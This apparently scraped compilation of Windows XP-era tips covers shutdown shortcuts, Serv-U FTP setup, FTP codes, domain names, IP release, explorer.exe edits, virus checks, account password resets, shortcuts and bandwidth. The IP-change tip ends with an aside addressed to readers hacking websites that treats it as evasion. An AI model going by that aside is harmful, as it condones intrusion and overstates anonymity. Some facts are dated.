But you can do much more with a shutdown shortcut than merely shut down your PC. You can add any combination of several switches to do extra duty, like this:
shutdown -r -t 01 -c "Rebooting your PC"Double-clicking on that shortcut will reboot your PC after a one-second delay and display the message "Rebooting your PC." The shutdown command includes a variety of switches you can use to customize it. Table 1-3 lists all of them and describes their use.
I use this technique to create two shutdown shortcuts on my desktop—one for turning off my PC, and one for rebooting. Here are the ones I use:
shutdown -s -t 03 -c "Bye Bye m8!"shutdown -r -t 03 -c "Ill be back m8 ;)!"
SwitchWhat it does
-sShuts down the PC.
-lLogs off the current user.
-t nnIndicates the duration of delay, in seconds, before performing the action.
-c "messagetext"Displays a message in the System Shutdown window. A maximum of 127 characters can be used. The message must be enclosed in quotation marks.
-fForces any running applications to shut down.
-rReboots the PC.
Create An Ftp Server On Your Pc With Serv-u


Requirements:Serv-UNo-IP.com Website
Quote:Step 1. Getting a static IP address.Get a static address for your FTP server. You will want to do this as opposed to using your IP address for several reasons. First, it’s easier keeping up-to-date. Imagine having to change all of your setting every time your IP changed. With No-IP, the No-IP service runs in background on your computer and updates your current IP address with your FTP server’s URL (for example, you get ftp://rkchoolie.serveftp.com). Second reason, you don’t want your IP address posted out there for everyone to see.
1. Go to www.No-IP.com to create a new user account.2. Fill in the information that is required and the click Register button.3. Your account has now been created and your account password has been emailed to you.4. Check your email mailbox and wait for the mail that contains your password5. Go back to www.No-IP.com and type your email address and password to login to your account.6. Once in your account, click on Add a host in the left menu7. Type in the Hostname you want (example: rkchoolie) and pick a Domain from the list (example: ftpserve.com)8. Check Allow Wildcards and click the Submit button9. You now have your static address (example: rkchoolie.serveftp.com)10. Click on your OS link in the Dyn-Update Client in the bottom right menu and follow links to download the client11. Once downloaded, install the software and type in your email address and password when asked.12. Finally tick the checkbox near your static address.
You now have a static web address .
Quote:Step 2. Installing and setting the FTP server1. Install Serv-U 4.0.2. Start Serv-U and use the wizard to setup your ftp.3. Click next until you're asked for an IP address, leave it blank and then click next.4. Type the domain name you've just registered above (example: preacher.serveftp.com) in the domain name field and then click Next.5. You are asked if you want to allow anonymous access, select No and then click next.6. You are then asked to create a named account, check yes and then click next.7. Type in the user name you wish for this account (example: Harrie) and click next.8. Type a password for this account (example: $p3c1aL). For security reasons, try to create a password with some letters, numbers and special characters. Then click next.9. You will then be asked for the Home directory of the account you just created. Select the directory and then click next.10. Select yes to lock this account to the Home directory. You want to do this so that the user can not go any further up that his home directory. Click next.11. The account is now set so click finish.
Quote:Step 3. Configuring user accounts1. In the left tree-menu, select the account you've just created and then click on the General tab.2. Check Hide ‘Hidden’ Files.3. Check Allow only and enter the number one in the box.4. Set the Max. download speed to what ever you want. If this is an account that many will be using, set it low to save on your bandwidth. I usually have mine set between 10 – 20. If you leave it blank, users will be able to download from you at full bandwidth.5. Set the Max no. of users to how many you want to be able to log on at one time. This depends on your connection speed but try these (56 - 1, ISDN - 3, ADSL or cable - 5-6 users.)6. Now, click on the Dir Access tab.7. You should see the home folder in there. Highlight it and make your permissions.8. If you only want users to be able to download check only Read, List, & Inherit.9. If you want users to be able to upload, but to only one particular folder but not download, click the add button and then select that folder. Now highlight the folder and set these permissions on that folder. Check Write, Append, List, Create, & Inherit. Once you have made the permissions click on the up arrow that is located at the bottom right-hand corner. You want this special upload folder to be list first, before the home folder.10. If there is a folder that you don’t want anyone to have access to, but it is inside the home folder, then click the add button and then select that folder. Now highlight the folder and make sure that all checkboxes are left. Once you have made the permissions click on the up arrow that is located at the bottom right-hand corner. You want this no access folder to be listed at the very top.11. There are many other different sets of permissions you can play with. I just covered your basics.12. Your server is now set!13. Try logging on with the username and password and see if it works.
~~~~~~~~~COMMON FTP ERROR CODES~~~~~~~


# Description
110 Restart marker reply. In this case, the text is exact and not left to the particular implementation; it must read: MARK yyyy = mmmm where yyyy is User-process data stream marker, and mmmm server's equivalent marker (note the spaces between markers and "=").
120 Service ready in nnn minutes.
125 Data connection already open; transfer starting.
150 File status okay; about to open data connection.
200 Command okay.
202 Command not implemented, superfluous at this site.
211 System status, or system help reply.
212 Directory status.
213 File status.
214 Help message.On how to use the server or the meaning of a particular non-standard command. This reply is useful only to the human user.
215 NAME system type. Where NAME is an official system name from the list in the Assigned Numbers document.
220 Service ready for new user.
221 Service closing control connection.
225 Data connection open; no transfer in progress.
226 Closing data connection. Requested file action successful (for example, file transfer or file abort).
227 Entering Passive Mode (h1,h2,h3,h4,p1,p2).
230 User logged in, proceed. Logged out if appropriate.
250 Requested file action okay, completed.
257 "PATHNAME" created.
331 User name okay, need password.
332 Need account for login.
350 Requested file action pending further information
421 Service not available, closing control connection.This may be a reply to any command if the service knows it must shut down.
425 Can't open data connection.
426 Connection closed; transfer aborted.
450 Requested file action not taken.
451 Requested action aborted. Local error in processing.
452 Requested action not taken. Insufficient storage space in system.File unavailable (e.g., file busy).
500 Syntax error, command unrecognized. This may include errors such as command line too long.
501 Syntax error in parameters or arguments.
502 Command not implemented.
503 Bad sequence of commands.
504 Command not implemented for that parameter.
530 Not logged in.
532 Need account for storing files.
550 Requested action not taken. File unavailable (e.g., file not found, no access).
551 Requested action aborted. Page type unknown.
552 Requested file action aborted. Exceeded storage allocation (for current directory or dataset).
553 Requested action not taken. File name not allowed.

Choosing A Good Domain Name, ya..good name is important!

Choosing A Good Domain Name, ya..good name is important!


Choosing a domain name for your site is one of the most important steps towards creating the perfect internet presence. If you run an on-line business, picking a name that will be marketable and achieve success in search engine placement is paramount. Many factors must be considered when choosing a good domain name. This article summarizes all the different things to consider before making that final registration step!
Short and Sweet
Domain names can be really long or really short (1 - 67 characters). In general, it is far better to choose a domain name that is short in length. The shorter your domain name, the easier it will be for people remember. Remembering a domain name is very important from a marketability perspective. As visitors reach your site and enjoy using it, they will likely tell people about it. And those people may tell others, etc. As with any business, word of mouth is the most powerful marketing tool to drive traffic to your site (and it's free too!). If your site is long and difficult to pronounce, people will not remember the name of the site and unless they bookmark the link, they may never return.
Consider Alternatives
Unless a visitor reaches your site through a bookmark or a link from another site, they have typed in your domain name. Most people on the internet are terrible typists and misspell words constantly. If your domain name is easy to misspell, you should think about alternate domain names to purchase. For example, if your site will be called "MikesTools.com", you should also consider buying "MikeTools.com" and "MikeTool.com". You should also secure the different top level domain names besides the one you will use for marketing purposes ("MikesTools.net", "MikesTools.org", etc.) You should also check to see if there are existing sites based on the misspelled version of the domain name you are considering. "MikesTools.com" may be available, but "MikesTool.com" may be home to a graphic pornography site. You would hate for a visitor to walk away thinking you were hosting something they did not expect.
Also consider domain names that may not include the name of your company, but rather what your company provides. For example, if the name of your company is Mike's Tools, you may want to consider domain names that target what you sell. For example: "buyhammers.com" or "hammer-and-nail.com". Even though these example alternative domain names do not include the name of your company, it provides an avenue for visitors from your target markets. Remember that you can own multiple domain names, all of which can point to a single domain. For example, you could register "buyhammers.com", "hammer-and-nail.com", and "mikestools.com" and have "buyhammers.com" and "hammer-and-nail.com" point to "mikestools.com".
Hyphens: Your Friend and Enemy
Domain name availability has become more and more scant over the years. Many single word domain names have been scooped up which it makes it more and more difficult to find a domain name that you like and is available. When selecting a domain name, you have the option of including hyphens as part of the name. Hyphens help because it allows you to clearly separate multiple words in a domain name, making it less likely that a person will accidentally misspell the name. For example, people are more likely to misspell "domainnamecenter.com" than they are "domain-name-center.com". Having words crunched together makes it hard on the eyes, increasing the likelihood of a misspelling. On the other hand, hyphens make your domain name longer. The longer the domain name, the easier it is for people to forget it altogether. Also, if someone recommends a site to someone else, they may forget to mention that each word in the domain name is separated by a hyphen. If do you choose to leverage hyphens, limit the number of words between the hyphens to three. Another advantage to using hyphens is that search engines are able to pick up each unique word in the domain name as key words, thus helping to make your site more visible in search engine results.
Dot What?
There are many top level domain names available today including .com, .net, .org, and .biz. In most cases, the more unusual the top level domain, the more available domain names are available. However, the .com top level domain is far and away the most commonly used domain on the internet, driven by the fact that it was the first domain extension put to use commercially and has received incredible media attention. If you cannot lay your hands on a .com domain name, look for a .net domain name, which is the second most commercially popular domain name extension.
Long Arm of the Law
Be very careful not to register domain names that include trademarked names. Although internet domain name law disputes are tricky and have few cases in existence, the risk of a legal battle is not a risk worth taking. Even if you believe your domain name is untouchable by a business that has trademarked a name, do not take the chance: the cost of litigation is extremely high and unless you have deep pockets you will not likely have the resources to defend yourself in a court of law. Even stay away from domain names in which part of the name is trademarked: the risks are the same.
Search Engines and Directories
All search engines and directories are different. Each has a unique process for being part of the results or directory listing and each has a different way of sorting and listing domain names. Search engines and directories are the most important on-line marketing channel, so consider how your domain name choice affects site placement before you register the domain. Most directories simply list links to home pages in alphabetical order. If possible, choose a domain name with a letter of the alphabet near the beginning ("a" or "b"). For example, "aardvark-pest-control.com" will come way above "joes-pest-control.com". However, check the directories before you choose a domain name. You may find that the directories you would like be in are already cluttered with domain names beginning with the letter "a". Search engines scan websites and sort results based on key words. Key words are words that a person visiting a search engine actually search on. Having key words as part of your domain name can help you get better results.


How To: Change Your Ip In Less Then 1 Minute

How To: Change Your Ip In Less Then 1 Minute


1. Click on "Start" in the bottom left hand corner of screen2. Click on "Run"3. Type in "command" and hit ok
You should now be at an MSDOS prompt screen.
4. Type "ipconfig /release" just like that, and hit "enter"5. Type "exit" and leave the prompt6. Right-click on "Network Places" or "My Network Places" on your desktop.7. Click on "properties"
You should now be on a screen with something titled "Local Area Connection", or something close to that, and, if you have a network hooked up, all of your other networks.
8. Right click on "Local Area Connection" and click "properties"9. Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab10. Click on "Use the following IP address" under the "General" tab11. Create an IP address (It doesn't matter what it is. I just type 1 and 2 until i fill the area up).12. Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.13. Hit the "Ok" button here14. Hit the "Ok" button again
You should now be back to the "Local Area Connection" screen.
15. Right-click back on "Local Area Connection" and go to properties again.16. Go back to the "TCP/IP" settings17. This time, select "Obtain an IP address automatically"tongue.gif 18. Hit "Ok"19. Hit "Ok" again20. You now have a new IP address
With a little practice, you can easily get this process down to 15 seconds.
P.S:This only changes your dynamic IP address, not your ISP/IP address. If you plan on hacking a website with this trick be extremely careful, because if they try a little, they can trace it back

Change Text on XP Start Button

Change Text on XP Start Button


Step 1 - Modify Explorer.exe File
In order to make the changes, the file explorer.exe located at C:\Windows needs to be edited. Since explorer.exe is a binary file it requires a special editor. For purposes of this article I have used Resource Hacker. Resource HackerTM is a freeware utility to view, modify, rename, add, delete and extract resources in 32bit Windows executables and resource files (*.res). It incorporates an internal resource script compiler and decompiler and works on Microsoft Windows 95/98/ME, Windows NT, Windows 2000 and Windows XP operating systems.
get this from h**p://delphi.icm.edu.pl/ftp/tools/ResHack.zip
The first step is to make a backup copy of the file explorer.exe located at C:\Windows\explorer. Place it in a folder somewhere on your hard drive where it will be safe. Start Resource Hacker and open explorer.exe located at C:\Windows\explorer.exe.
The category we are going to be using is "String Table". Expand it by clicking the plus sign then navigate down to and expand string 37 followed by highlighting 1033. If you are using the Classic Layout rather than the XP Layout, use number 38. The right hand pane will display the stringtable. We’re going to modify item 578, currently showing the word “start” just as it displays on the current Start button.
There is no magic here. Just double click on the word “start” so that it’s highlighted, making sure the quotation marks are not part of the highlight. They need to remain in place, surrounding the new text that you’ll type. Go ahead and type your new entry. In my case I used Click Me!
You’ll notice that after the new text string has been entered the Compile Script button that was grayed out is now active. I won’t get into what’s involved in compiling a script, but suffice it to say it’s going to make this exercise worthwhile. Click Compile Script and then save the altered file using the Save As command on the File Menu. Do not use the Save command – Make sure to use the Save As command and choose a name for the file. Save the newly named file to C:\Windows.
Step 2 – Modify the Registry
!!!make a backup of your registry before making changes!!!
Now that the modified explorer.exe has been created it’s necessary to modify the registry so the file will be recognized when the user logs on to the system. If you don’t know how to access the registry I’m not sure this article is for you, but just in case it’s a temporary memory lapse, go to Start (soon to be something else) Run and type regedit in the Open field. Navigate to:
HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows NT\ CurrentVersion\ Winlogon
In the right pane, double click the "Shell" entry to open the Edit String dialog box. In Value data: line, enter the name that was used to save the modified explorer.exe file. Click OK.
Close Registry Editor and either log off the system and log back in, or reboot the entire system if that’s your preference. If all went as planned you should see your new Start button with the revised text.[/b]

Caught A Virus?

Caught A Virus?


If you've let your guard down--or even if you haven't--it can be hard to tell if your PC is infected. Here's what to do if you suspect the worst.
Heard this one before? You must run antivirus software and keep it up to date or else your PC will get infected, you'll lose all your data, and you'll incur the wrath of every e-mail buddy you unknowingly infect because of your carelessness.
You know they're right. Yet for one reason or another, you're not running antivirus software, or you are but it's not up to date. Maybe you turned off your virus scanner because it conflicted with another program. Maybe you got tired of upgrading after you bought Norton Antivirus 2001, 2002, and 2003. Or maybe your annual subscription of virus definitions recently expired, and you've put off renewing.
It happens. It's nothing to be ashamed of. But chances are, either you're infected right now, as we speak, or you will be very soon.
For a few days in late January, the Netsky.p worm was infecting about 2,500 PCs a day. Meanwhile the MySQL bot infected approximately 100 systems a minute (albeit not necessarily desktop PCs). As David Perry, global director of education for security software provider Trend Micro, puts it, "an unprotected [Windows] computer will become owned by a bot within 14 minutes."
Today's viruses, worms, and so-called bots--which turn your PC into a zombie that does the hacker's bidding (such as mass-mailing spam)--aren't going to announce their presence. Real viruses aren't like the ones in Hollywood movies that melt down whole networks in seconds and destroy alien spacecraft. They operate in the background, quietly altering data, stealing private operations, or using your PC for their own illegal ends. This makes them hard to spot if you're not well protected.
Is Your PC "Owned?"
I should start by saying that not every system oddity is due to a virus, worm, or bot. Is your system slowing down? Is your hard drive filling up rapidly? Are programs crashing without warning? These symptoms are more likely caused by Windows, or badly written legitimate programs, rather than malware. After all, people who write malware want to hide their program's presence. People who write commercial software put icons all over your desktop. Who's going to work harder to go unnoticed?
Other indicators that may, in fact, indicate that there's nothing that you need to worry about, include:
* An automated e-mail telling you that you're sending out infected mail. E-mail viruses and worms typically come from faked addresses.* A frantic note from a friend saying they've been infected, and therefore so have you. This is likely a hoax. It's especially suspicious if the note tells you the virus can't be detected but you can get rid of it by deleting one simple file. Don't be fooled--and don't delete that file.
I'm not saying that you should ignore such warnings. Copy the subject line or a snippet from the body of the e-mail and plug it into your favorite search engine to see if other people have received the same note. A security site may have already pegged it as a hoax.
Sniffing Out an Infection
There are signs that indicate that your PC is actually infected. A lot of network activity coming from your system (when you're not actually using Internet) can be a good indicator that something is amiss. A good software firewall, such as ZoneAlarm, will ask your permission before letting anything leave your PC, and will give you enough information to help you judge if the outgoing data is legitimate. By the way, the firewall that comes with Windows, even the improved version in XP Service Pack 2, lacks this capability.
To put a network status light in your system tray, follow these steps: In Windows XP, choose Start, Control Panel, Network Connections, right-click the network connection you want to monitor, choose Properties, check "Show icon in notification area when connected," and click OK.
If you're interested in being a PC detective, you can sniff around further for malware. By hitting Ctrl-Alt-Delete in Windows, you'll bring up the Task Manager, which will show you the various processes your system is running. Most, if not all, are legit, but if you see a file name that looks suspicious, type it into a search engine and find out what it is.
Want another place to look? In Windows XP, click Start, Run, type "services.msc" in the box, and press Enter. You'll see detailed descriptions of the services Windows is running. Something look weird? Check with your search engine.
Finally, you can do more detective work by selecting Start, Run, and typing "msconfig" in the box. With this tool you not only see the services running, but also the programs that your system is launching at startup. Again, check for anything weird.
If any of these tools won't run--or if your security software won't run--that in itself is a good sign your computer is infected. Some viruses intentionally disable such programs as a way to protect themselves.
What to Do Next
Once you're fairly sure your system is infected, don't panic. There are steps you can take to assess the damage, depending on your current level of protection.
* If you don't have any antivirus software on your system (shame on you), or if the software has stopped working, stay online and go for a free scan at one of several Web sites. There's McAfee FreeScan, Symantec Security Check, and Trend Micro's HouseCall. If one doesn't find anything, try two. In fact, running a free online virus scan is a good way to double-check the work of your own local antivirus program. When you're done, buy or download a real antivirus program.* If you have antivirus software, but it isn't active, get offline, unplug wires-- whatever it takes to stop your computer from communicating via the Internet. Then, promptly perform a scan with the installed software.* If nothing seems to be working, do more research on the Web. There are several online virus libraries where you can find out about known viruses. These sites often provide instructions for removing viruses--if manual removal is possible--or a free removal tool if it isn't. Check out GriSOFT's Virus Encyclopedia, Eset's Virus Descriptions, McAffee's Virus Glossary, Symantec's Virus Encyclopedia, or Trend Micro's Virus Encyclopedia.
A Microgram of Prevention
Assuming your system is now clean, you need to make sure it stays that way. Preventing a breach of your computer's security is far more effective than cleaning up the mess afterwards. Start with a good security program, such Trend Micro's PC-Cillin, which you can buy for $50.
Don't want to shell out any money? You can cobble together security through free downloads, such as AVG Anti-Virus Free Edition, ZoneAlarm (a personal firewall), and Ad-Aware SE (an antispyware tool).
Just make sure you keep all security software up to date. The bad guys constantly try out new ways to fool security programs. Any security tool without regular, easy (if not automatic) updates isn't worth your money or your time.
Speaking of updating, the same goes for Windows. Use Windows Update (it's right there on your Start Menu) to make sure you're getting all of the high priority updates. If you run Windows XP, make sure to get the Service Pack 2 update. To find out if you already have it, right-click My Computer, and select Properties. Under the General tab, under System, it should say "Service Pack 2."
Here are a few more pointers for a virus-free life:
* Be careful with e-mail. Set your e-mail software security settings to high. Don't open messages with generic-sounding subjects that don't apply specifically to you from people you don't know. Don't open an attachment unless you're expecting it.* If you have broadband Internet access, such as DSL or cable, get a router, even if you only have one PC. A router adds an extra layer of protection because your PC is not connecting directly with the Internet.* Check your Internet ports. These doorways between your computer and the Internet can be open, in which case your PC is very vulnerable; closed, but still somewhat vulnerable; or stealthed (or hidden), which is safest. Visit Gibson Research's Web site and run the free ShieldsUP test to see your ports' status. If some ports show up as closed--or worse yet, open--check your router's documentation to find out how to hide them.

cannot use my password to get back into Windows XP

Cannot use my password to get back into Windows XP


Because of the security features built into Windows XP, it is virtually impossible to get back into the system without the password.You have several options to try and get around this problem.
If you have access to another user account with administrator rights, you can use that account to change the passwordof the account that is locked out. You can also use the default Administrator account that is built into Windows XP.
First you need to boot the system into Safe Mode.1.Restart your system.2.When you see the blue Dell globe or screen, press the ( F8 ) key about 3 times a second.3.You should get the Windows startup menu. Use the (Up or Down) arrow keys to highlight (SafeMode)4.Press (Enter) on (Safe Mode), then press (Enter) on (Windows XP).5.The system should boot to Safe Mode.
Once you are at the Account Log on Screen, click on the iconfor the user account with administrator rights, or click on the iconfor the administrators account.Note: For Home the Administrator account isn't normally shown & in Safe Mode you have to press Ctrl+Alt+Delete keys twice to show.For PRO you can do this in normal mode
When the system has booted to the desktop, use the following steps to change the accounts password.1.Click Start, Control Panel, Administrative Tools.2.Click Computer Management.3.Double click Local Users and Groups, double click the folder Users.4.Right click on the account name that is locked out, and click on Set Password.5.You may get a warning message about changing the password, simply click proceed.6.Leave the New Password box blank, also leave the Confirm Password box blank.7.Click OK, and OK again.8.Then close all Windows, reboot the system and try to log in.
There are also applications that can recover the password for you.The following companies provide these applications at a cost.iOpus® Password Recovery XP here.LostPassword.com, here.Asterisk Password Recovery XP v1.89 here.Windows XP / 2000 / NT Key here.
If the above information does not help in recovering the password, the only option left is toformat the hard drive then reinstall Windows and the system software.

Best Keyboard Shortcuts

Best Keyboard Shortcuts


Windows key + R = Run menu
This is usually followed by:cmd = Command Promptiexplore + "web address" = Internet Explorercompmgmt.msc = Computer Managementdhcpmgmt.msc = DHCP Managementdnsmgmt.msc = DNS Managementservices.msc = Serviceseventvwr = Event Viewerdsa.msc = Active Directory Users and Computersdssite.msc = Active Directory Sites and ServicesWindows key + E = Explorer
ALT + Tab = Switch between windows
ALT, Space, X = Maximize window
CTRL + Shift + Esc = Task Manager
Windows key + Break = System properties
Windows key + F = Search
Windows key + D = Hide/Display all windows
CTRL + C = copy
CTRL + X = cut
CTRL + V = paste
Also don't forget about the "Right-click" key next to the right Windows key on your keyboard. Using the arrows and that key can get just about anything done once you've opened up any program.
Keyboard Shortcuts
[Alt] and [Esc] Switch between running applications
[Alt] and letter Select menu item by underlined letter
[Ctrl] and [Esc] Open Program Menu
[Ctrl] and [F4] Close active document or group windows (does not work with some applications)
[Alt] and [F4] Quit active application or close current window
[Alt] and [-] Open Control menu for active document
Ctrl] Lft., Rt. arrow Move cursor forward or back one word
Ctrl] Up, Down arrow Move cursor forward or back one paragraph
[F1] Open Help for active application
Windows+M Minimize all open windows
Shift+Windows+M Undo minimize all open windows
Windows+F1 Open Windows Help
Windows+Tab Cycle through the Taskbar buttons
Windows+Break Open the System Properties dialog box

acessability shortcuts
Right SHIFT for eight seconds........ Switch FilterKeys on and off.
Left ALT +left SHIFT +PRINT SCREEN....... Switch High Contrast on and off.
Left ALT +left SHIFT +NUM LOCK....... Switch MouseKeys on and off.
SHIFT....... five times Switch StickyKeys on and off.
NUM LOCK...... for five seconds Switch ToggleKeys on and off.
explorer shortcuts
END....... Display the bottom of the active window.
HOME....... Display the top of the active window.
NUM LOCK+ASTERISK....... on numeric keypad (*) Display all subfolders under the selected folder.
NUM LOCK+PLUS SIGN....... on numeric keypad (+) Display the contents of the selected folder.
NUM LOCK+MINUS SIGN....... on numeric keypad (-) Collapse the selected folder.
LEFT ARROW...... Collapse current selection if it's expanded, or select parent folder.
RIGHT ARROW....... Display current selection if it's collapsed, or select first subfolder.

Type the following commands in your Run Box (Windows Key + R) or Start Run
devmgmt.msc = Device Managermsinfo32 = System Informationcleanmgr = Disk Cleanupntbackup = Backup or Restore Wizard (Windows Backup Utility)mmc = Microsoft Management Consoleexcel = Microsoft Excel (If Installed)msaccess = Microsoft Access (If Installed)powerpnt = Microsoft PowerPoint (If Installed)winword = Microsoft Word (If Installed)frontpg = Microsoft FrontPage (If Installed)notepad = Notepadwordpad = WordPadcalc = Calculatormsmsgs = Windows Messengermspaint = Microsoft Paintwmplayer = Windows Media Playerrstrui = System Restorenetscp6 = Netscape 6.xnetscp = Netscape 7.xnetscape = Netscape 4.xwaol = America Onlinecontrol = Opens the Control Panelcontrol printers = Opens the Printers Dialog
internetbrowser
type in u're adress "google", then press [Right CTRL] and [Enter]add www. and .com to word and go to it
For Windows XP:
Copy. CTRL+CCut. CTRL+XPaste. CTRL+VUndo. CTRL+ZDelete. DELETEDelete selected item permanently without placing the item in the Recycle Bin. SHIFT+DELETECopy selected item. CTRL while dragging an itemCreate shortcut to selected item. CTRL+SHIFT while dragging an itemRename selected item. F2Move the insertion point to the beginning of the next word. CTRL+RIGHT ARROWMove the insertion point to the beginning of the previous word. CTRL+LEFT ARROWMove the insertion point to the beginning of the next paragraph. CTRL+DOWN ARROWMove the insertion point to the beginning of the previous paragraph. CTRL+UP ARROWHighlight a block of text. CTRL+SHIFT with any of the arrow keysSelect more than one item in a window or on the desktop, or select text within a document. SHIFT with any of the arrow keysSelect all. CTRL+ASearch for a file or folder. F3View properties for the selected item. ALT+ENTERClose the active item, or quit the active program. ALT+F4Opens the shortcut menu for the active window. ALT+SPACEBARClose the active document in programs that allow you to have multiple documents open simultaneously. CTRL+F4Switch between open items. ALT+TABCycle through items in the order they were opened. ALT+ESCCycle through screen elements in a window or on the desktop. F6Display the Address bar list in My Computer or Windows Explorer. F4Display the shortcut menu for the selected item. SHIFT+F10Display the System menu for the active window. ALT+SPACEBARDisplay the Start menu. CTRL+ESCDisplay the corresponding menu. ALT+Underlined letter in a menu nameCarry out the corresponding command. Underlined letter in a command name on an open menuActivate the menu bar in the active program. F10Open the next menu to the right, or open a submenu. RIGHT ARROWOpen the next menu to the left, or close a submenu. LEFT ARROWRefresh the active window. F5View the folder one level up in My Computer or Windows Explorer. BACKSPACECancel the current task. ESCSHIFT when you insert a CD into the CD-ROM drive Prevent the CD from automatically playing.
Use these keyboard shortcuts for dialog boxes:
To PressMove forward through tabs. CTRL+TABMove backward through tabs. CTRL+SHIFT+TABMove forward through options. TABMove backward through options. SHIFT+TABCarry out the corresponding command or select the corresponding option. ALT+Underlined letterCarry out the command for the active option or button. ENTERSelect or clear the check box if the active option is a check box. SPACEBARSelect a button if the active option is a group of option buttons. Arrow keysDisplay Help. F1Display the items in the active list. F4Open a folder one level up if a folder is selected in the Save As or Open dialog box. BACKSPACE
If you have a Microsoft Natural Keyboard, or any other compatible keyboard that includes the Windows logo key and the Application key , you can use these keyboard shortcuts:
Display or hide the Start menu. WIN KeyDisplay the System Properties dialog box. WIN Key+BREAKShow the desktop. WIN Key+DMinimize all windows. WIN Key+MRestores minimized windows. WIN Key+Shift+MOpen My Computer. WIN Key+ESearch for a file or folder. WIN Key+FSearch for computers. CTRL+WIN Key+FDisplay Windows Help. WIN Key+F1Lock your computer if you are connected to a network domain, or switch users if you are not connected to a network domain. WIN Key+ LOpen the Run dialog box. WIN Key+ROpen Utility Manager. WIN Key+U
accessibility keyboard shortcuts:
Switch FilterKeys on and off. Right SHIFT for eight secondsSwitch High Contrast on and off. Left ALT+left SHIFT+PRINT SCREENSwitch MouseKeys on and off. Left ALT +left SHIFT +NUM LOCKSwitch StickyKeys on and off. SHIFT five timesSwitch ToggleKeys on and off. NUM LOCK for five secondsOpen Utility Manager. WIN Key+U
shortcuts you can use with Windows Explorer:
Display the bottom of the active window. ENDDisplay the top of the active window. HOMEDisplay all subfolders under the selected folder. NUM LOCK+ASTERISK on numeric keypad (*)Display the contents of the selected folder. NUM LOCK+PLUS SIGN on numeric keypad (+)Collapse the selected folder. NUM LOCK+MINUS SIGN on numeric keypad (-)Collapse current selection if it's expanded, or select parent folder. LEFT ARROWDisplay current selection if it's collapsed, or select first subfolder. RIGHT ARROW

Bandwidth Explained!

BandWidth Explained


Most hosting companies offer a variety of bandwidth options in their plans. So exactly what is bandwidth as it relates to web hosting? Put simply, bandwidth is the amount of traffic that is allowed to occur between your web site and the rest of the internet. The amount of bandwidth a hosting company can provide is determined by their network connections, both internal to their data center and external to the public internet.
Network Connectivity
The internet, in the most simplest of terms, is a group of millions of computers connected by networks. These connections within the internet can be large or small depending upon the cabling and equipment that is used at a particular internet location. It is the size of each network connection that determines how much bandwidth is available. For example, if you use a DSL connection to connect to the internet, you have 1.54 Mega bits (Mb) of bandwidth. Bandwidth therefore is measured in bits (a single 0 or 1). Bits are grouped in bytes which form words, text, and other information that is transferred between your computer and the internet.
If you have a DSL connection to the internet, you have dedicated bandwidth between your computer and your internet provider. But your internet provider may have thousands of DSL connections to their location. All of these connection aggregate at your internet provider who then has their own dedicated connection to the internet (or multiple connections) which is much larger than your single connection. They must have enough bandwidth to serve your computing needs as well as all of their other customers. So while you have a 1.54Mb connection to your internet provider, your internet provider may have a 255Mb connection to the internet so it can accommodate your needs and up to 166 other users (255/1.54).
Traffic
A very simple analogy to use to understand bandwidth and traffic is to think of highways and cars. Bandwidth is the number of lanes on the highway and traffic is the number of cars on the highway. If you are the only car on a highway, you can travel very quickly. If you are stuck in the middle of rush hour, you may travel very slowly since all of the lanes are being used up.
Traffic is simply the number of bits that are transferred on network connections. It is easiest to understand traffic using examples. One Gigabyte is 2 to the 30th power (1,073,741,824) bytes. One gigabyte is equal to 1,024 megabytes. To put this in perspective, it takes one byte to store one character. Imagine 100 file cabinets in a building, each of these cabinets holds 1000 folders. Each folder has 100 papers. Each paper contains 100 characters - A GB is all the characters in the building. An MP3 song is about 4MB, the same song in wav format is about 40MB, a full length movie can be 800MB to 1000MB (1000MB = 1GB).
If you were to transfer this MP3 song from a web site to your computer, you would create 4MB of traffic between the web site you are downloading from and your computer. Depending upon the network connection between the web site and the internet, the transfer may occur very quickly, or it could take time if other people are also downloading files at the same time. If, for example, the web site you download from has a 10MB connection to the internet, and you are the only person accessing that web site to download your MP3, your 4MB file will be the only traffic on that web site. However, if three people are all downloading that same MP at the same time, 12MB (3 x 4MB) of traffic has been created. Because in this example, the host only has 10MB of bandwidth, someone will have to wait. The network equipment at the hosting company will cycle through each person downloading the file and transfer a small portion at a time so each person's file transfer can take place, but the transfer for everyone downloading the file will be slower. If 100 people all came to the site and downloaded the MP3 at the same time, the transfers would be extremely slow. If the host wanted to decrease the time it took to download files simultaneously, it could increase the bandwidth of their internet connection (at a cost due to upgrading equipment).
Hosting Bandwidth
In the example above, we discussed traffic in terms of downloading an MP3 file. However, each time you visit a web site, you are creating traffic, because in order to view that web page on your computer, the web page is first downloaded to your computer (between the web site and you) which is then displayed using your browser software (Internet Explorer, Netscape, etc.) . The page itself is simply a file that creates traffic just like the MP3 file in the example above (however, a web page is usually much smaller than a music file).
A web page may be very small or large depending upon the amount of text and the number and quality of images integrated within the web page. For example, the home page for CNN.com is about 200KB (200 Kilobytes = 200,000 bytes = 1,600,000 bits). This is typically large for a web page. In comparison, Yahoo's home page is about 70KB.
How Much Bandwidth Is Enough?
It depends (don't you hate that answer). But in truth, it does. Since bandwidth is a significant determinant of hosting plan prices, you should take time to determine just how much is right for you. Almost all hosting plans have bandwidth requirements measured in months, so you need to estimate the amount of bandwidth that will be required by your site on a monthly basis
If you do not intend to provide file download capability from your site, the formula for calculating bandwidth is fairly straightforward:
Average Daily Visitors x Average Page Views x Average Page Size x 31 x Fudge Factor
If you intend to allow people to download files from your site, your bandwidth calculation should be:
[(Average Daily Visitors x Average Page Views x Average Page Size) +(Average Daily File Downloads x Average File Size)] x 31 x Fudge Factor
Let us examine each item in the formula:
Average Daily Visitors - The number of people you expect to visit your site, on average, each day. Depending upon how you market your site, this number could be from 1 to 1,000,000.
Average Page Views - On average, the number of web pages you expect a person to view. If you have 50 web pages in your web site, an average person may only view 5 of those pages each time they visit.
Average Page Size - The average size of your web pages, in Kilobytes (KB). If you have already designed your site, you can calculate this directly.
Average Daily File Downloads - The number of downloads you expect to occur on your site. This is a function of the numbers of visitors and how many times a visitor downloads a file, on average, each day.
Average File Size - Average file size of files that are downloadable from your site. Similar to your web pages, if you already know which files can be downloaded, you can calculate this directly.
Fudge Factor - A number greater than 1. Using 1.5 would be safe, which assumes that your estimate is off by 50%. However, if you were very unsure, you could use 2 or 3 to ensure that your bandwidth requirements are more than met.
Usually, hosting plans offer bandwidth in terms of Gigabytes (GB) per month. This is why our formula takes daily averages and multiplies them by 31.
Summary
